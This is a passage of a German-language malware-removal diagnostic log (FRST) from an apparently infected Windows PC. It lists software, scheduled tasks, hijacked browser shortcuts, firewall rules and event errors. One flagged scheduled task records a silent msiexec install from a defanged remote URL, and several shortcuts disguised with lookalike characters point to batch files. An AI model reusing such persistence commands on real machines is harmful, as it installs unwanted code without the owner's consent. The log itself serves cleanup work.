Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 53.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 de)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
Mp3tag v2.75 (HKLM-x32\...\Mp3tag) (Version: v2.75 - Florian Heidenreich)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.6 - F.J. Wechselberger)
Nero 10 Movie ThemePack 1 (HKLM-x32\...\{43FBAB46-5969-4200-9958-1FF81FEE506F}) (Version: 10.2.10000.11.0 - Nero AG)
Nero BurnRights 10 (HKLM-x32\...\{943CFD7D-5336-47AF-9418-E02473A5A517}) (Version: 4.2.10500.1.102 - Nero AG)
Nero CoverDesigner 10 (HKLM-x32\...\{FCF00A6E-FB58-477A-ABE9-232907105521}) (Version: 5.2.11400.11.100 - Nero AG)
Nero DiscSpeed 10 (HKLM-x32\...\{34490F4E-48D0-492E-8249-B48BECF0537C}) (Version: 6.2.10500.2.100 - Nero AG)
Nero Express 10 (HKLM-x32\...\{70550193-1C22-445C-8FA4-564E155DB1A7}) (Version: 10.2.11900.20.100 - Nero AG)
Nero InfoTool 10 (HKLM-x32\...\{F412B4AF-388C-4FF5-9B2F-33DB1C536953}) (Version: 7.2.10400.5.100 - Nero AG)
Nero MediaHub 10 (HKLM-x32\...\{1F7FB68F-52F6-46A3-B42F-38CE46295AE5}) (Version: 1.2.13200.33.100 - Nero AG)
Nero Multimedia Suite 10 Essentials (HKLM-x32\...\{ADEF1F0B-635E-4041-B50F-A510C1B4D2C5}) (Version: 10.5.10400 - Nero AG)
Nero RescueAgent 10 (HKLM-x32\...\{E337E787-CF61-4B7B-B84F-509202A54023}) (Version: 3.2.10800.9.100 - Nero AG)
Nero StartSmart 10 (HKLM-x32\...\{F61D489E-6C44-49AC-AD02-7DA8ACA73A65}) (Version: 10.2.11600.14.100 - Nero AG)
Nero Update (HKLM-x32\...\{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}) (Version: 1.0.0018 - Nero AG)
NVIDIA 3D Vision Treiber 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.91 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.22 - NVIDIA Corporation)
NVIDIA Grafiktreiber 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.91 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Paint.NET v3.5.10 (HKLM\...\{529125EF-E3AC-4B74-97E6-F688A7C0F1C0}) (Version: 3.60.0 - dotPDN LLC)
PDF Architect (HKLM-x32\...\{064A929A-4DE8-40CF-A901-BD40C14E4D25}) (Version: 1.1.83.9982 - pdfforge GmbH)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.1 - pdfforge)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.038 - FUJITSU LIMITED)
QuickSteuer Deluxe 2016 (HKLM-x32\...\{3077FB33-83B4-4B16-9A35-CD160CD3D012}) (Version: 21.33.90 - Haufe-Lexware GmbH & Co.KG)
QuickSteuer Deluxe 2017 (HKLM-x32\...\{BC0423F1-44FC-43B2-BC77-ED912E75D64F}) (Version: 22.30.70 - Haufe-Lexware GmbH & Co.KG)
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RedMon - Redirection Port Monitor (HKLM\...\Redirection Port Monitor) (Version:  - )
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.22 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
Smart Cutter (HKLM-x32\...\{828FFE22-A27D-4891-BF79-CE78C9E1F478}) (Version: 1.8.1 - FameRing)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.19.1 - Synaptics Incorporated)
tiptoi® Manager 3.0.9 (HKLM-x32\...\9978-5763-2995-5228) (Version: 3.0.9 - Ravensburger AG)
Update for PDF Writer (HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\DigitalSite) (Version:  - ) <==== ACHTUNG
WIDCOMM Bluetooth Software (HKLM\...\{6E7F4CA3-B2DE-413C-A7A1-43AA5BE19EA1}) (Version: 6.5.0.3100 - Broadcom Corporation)
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh - ActiveX-besturingselement voor externe verbindingen (HKLM-x32\...\{C32CE55C-12BA-4951-8797-0967FDEF556F}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM-x32\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{C63A1E60-B6A4-440B-89A5-1FC6E4AC1C94}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Boxbob\Application\chrome.exe" "%1" <==== ACHTUNG

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {09684BE9-6801-4ACC-A441-372E5344685D} - System32\Tasks\{FD46ED85-54A0-43DF-9695-7871B128BD8A} => pcalua.exe -a C:\Users\Markus\Downloads\msicuu2.exe -d C:\Users\Markus\Downloads
Task: {18C0FF31-C5C7-4CA8-BDEF-E6855B0DD134} - System32\Tasks\Microsoft\Windows\Media Center\VCore => C:\ProgramData\vCore\VCore.exe [2016-11-10] () <==== ACHTUNG
Task: {235BC95F-90C6-4A38-A70A-AE3C9F5D5481} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe 
Task: {5CBA789E-743C-4F3C-BBB6-889D39EDF9BC} - System32\Tasks\Jujalyclartion Launcher => C:\Program Files (x86)\Prodak\xplidack.exe 
Task: {63450DF1-2C0B-428E-BFAC-EC1022663B86} - System32\Tasks\HPLJCustParticipation => C:\Program Files (x86)\HP\HPLJUT\HPLJUTSCH.exe [2012-06-14] (Hewlett Packard)
Task: {7A2D82DC-B977-42C6-B06F-305C2A0FCC4B} - \Samsung Update -> Keine Datei <==== ACHTUNG
Task: {9E499590-0B71-46E5-A0D1-7999EF821021} - System32\Tasks\Fujitsu\DeskUpdate => c:\Fujitsu\Programs\DeskUpdate\ducmd.exe [2015-06-15] (Fujitsu Technology Solutions)
Task: {A5F517D2-8E40-4B4D-BE10-8FA4B3FC7737} - \DigitalSite -> Keine Datei <==== ACHTUNG
Task: {AF87EE5A-0FFE-4949-B2EC-5914C44C1F2C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {B28FBEA4-57C7-46AC-99F4-93A8B224A578} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {B63B338D-2191-45D3-814B-CD40E4AF8882} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe 
Task: {B6CEEF38-5E00-4EAF-B77C-A1ABBD8D451B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe 
Task: {BD8FF9A2-1BE8-4462-B889-1D0245A1B4C5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {BE571A95-F9AD-46C2-93D0-C2AE61480FCE} - System32\Tasks\Plirisy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=IntensoXXSSDXSataXIII_AA000000000000003571&amp;d=20170420 /q <==== ACHTUNG
Task: {C5822879-831F-43BA-A61F-5B932F493306} - \Scheduled Update for Ask Toolbar -> Keine Datei <==== ACHTUNG
Task: {C5AA2588-EC43-4B8A-B1E4-C59182E532A7} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-13] (Adobe Systems Incorporated)
Task: {EBC15A2C-025C-4ECA-98E9-4C78CF03571E} - \Windows-PG -> Keine Datei <==== ACHTUNG
Task: {FE5E5492-AD3E-49DF-A90E-C79C6B325289} - \Milimili -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Explorеr.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехplorеr (Nо Add-оns).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gооgle Сhrоmе.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.emorhc.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnet Ехрlоrеr Вrowser.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Explorеr.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Eхplorеr (3).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Еxрlorеr (2).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzilla Firefоx.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.xoferif.bat ()
Shortcut: C:\Users\Public\Desktop\ZооmВrоwsеr EХ.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.resworbmooz.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2013-10-27 09:03 - 2016-02-09 10:39 - 00020536 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2012-11-07 06:17 - 2016-02-09 07:41 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2013-03-27 22:39 - 2010-06-17 21:56 - 00087040 _____ () C:\Windows\System32\redmonnt.dll
2008-10-24 17:35 - 2008-10-24 17:35 - 00128296 _____ () C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe
2013-11-06 16:52 - 2013-11-06 16:52 - 02258000 _____ () C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-11-06 12:58 - 2013-11-06 12:58 - 02048000 _____ () C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll
2016-02-15 19:01 - 2016-01-12 06:43 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2012-01-25 05:00 - 2011-12-15 15:34 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2015-06-22 19:41 - 2016-01-12 06:43 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2013-10-27 09:03 - 2016-02-09 10:39 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2013-11-06 12:59 - 2013-11-06 12:59 - 01633280 _____ () C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll
2012-02-25 02:37 - 2011-12-16 03:39 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2015-11-11 03:42 - 2015-11-11 03:42 - 01045672 _____ () C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

Da befinden sich 7934 mehr Seiten.

IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123simsen.com -> www.123simsen.com

Da befinden sich 7934 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2017-05-05 18:51 - 00000853 _____ C:\Windows\system32\Drivers\etc\hosts


0.0.0.1	mssplus.mcafee.com

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.179.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{05211D32-AF63-4CB0-A6B7-B09C94D0B99B}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{71D985ED-FDF0-42DE-9FC4-7C21A11D9FA0}] => (Allow) LPort=2869
FirewallRules: [{E65EEBEE-05F0-4C72-A9EE-0AA508672421}] => (Allow) LPort=1900
FirewallRules: [{9AA5011A-0FCC-4D9D-8784-BD7401D7A24A}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{EE66A64E-5B37-4916-9CC4-D4FBBB548A42}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{3C0F122C-0742-46E8-AC7F-1C1E9EEBC53E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{FE0D6C86-8FFE-4877-8D0D-B0F7F5B00E9B}C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe] => (Allow) C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe
FirewallRules: [UDP Query User{0BA32332-6631-4B2C-B5B3-F4555E347C79}C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe] => (Allow) C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe
FirewallRules: [TCP Query User{1D9F0CA1-AB5A-4249-8524-86D12D4C7170}C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe] => (Block) C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [UDP Query User{CFD99534-FA56-4434-8213-7F76D477B272}C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe] => (Block) C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [{480E6B07-798E-4A2D-81A6-F92F0CB9EE60}] => (Allow) C:\Program Files (x86)\Lexware\Update Service\Hmg.InstallationService.Service.exe
FirewallRules: [{2A3583E9-7472-4D17-A5D4-47875FB42265}] => (Allow) C:\Program Files (x86)\Lexware\Update Service\Hmg.InstallationService.Service.exe
FirewallRules: [{C41C6DD4-CFFF-4655-874D-5CE44166C462}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\FaxApplications.exe
FirewallRules: [{CE06C567-97E9-467D-80F3-09CC2E7B28DE}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\DigitalWizards.exe
FirewallRules: [{5F4AD41E-6132-4D82-86A4-473BA3D09A0D}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\Bin\HPNetworkCommunicator.exe
FirewallRules: [{2702B751-16F9-48CD-9E49-A21421E09842}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\EWSProxy.exe
FirewallRules: [{3EB39716-41BA-45F6-AE81-D61AA6F58713}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{67109041-ED86-4F91-8309-D8BD9F30FA0D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{7500E678-5CB9-4385-8912-54B1C9347BE5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{CEDAF5DD-17C1-4B9F-89B2-88A0383795AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{2E65A8BF-A7AF-4F73-8D0A-3E85DAFED6C9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{83D8589A-4A65-4922-BDEA-1DA480FB8729}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{E6FBF0C0-7479-404F-ABB6-8EDD2183B6BE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{BED2074E-60D7-4BB9-B15E-E4FFED41D21D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A59E9212-F88E-4BFF-ABE9-AE66ECBF2286}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6CCE5B8D-1C91-4A2C-88ED-15572F05F895}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E675A3F9-E1A9-42E5-A350-CF44D1BC3BA8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{64AF72C0-C954-42A9-AD2D-0D552A3F2C5D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{87A2FE0E-AB34-4C95-B10C-5D9081F3F38B}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{7CB36E57-5C15-40DA-B8BD-CA7ABFFAEE9C}] => (Allow) C:\Program Files (x86)\MIO\loader\intensoxxssdxsataxiii_aa000000000000003571.dat
FirewallRules: [{D2776C81-FAD8-4999-BFA5-7FDA506FBE9A}] => (Allow) C:\Program Files (x86)\MIO\loader\intensoxxssdxsataxiii_aa000000000000003571.dat
FirewallRules: [{E59CD4FF-E038-4054-A24D-14B9E22A1A3D}] => (Allow) C:\Program Files (x86)\Hotleaf\Application\chrome.exe

==================== Wiederherstellungspunkte =========================


==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft-Teredo-Tunneling-Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/20/2017 05:27:03 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/20/2017 05:25:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: SDFSSvc.exe, Version: 2.2.25.211, Zeitstempel: 0x525d1899
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7601.23796, Zeitstempel: 0x59028e59
Ausnahmecode: 0x0eedfade
Fehleroffset: 0x0000c54f
ID des fehlerhaften Prozesses: 0xe14
Startzeit der fehlerhaften Anwendung: 0x01d2d17a1420a30c
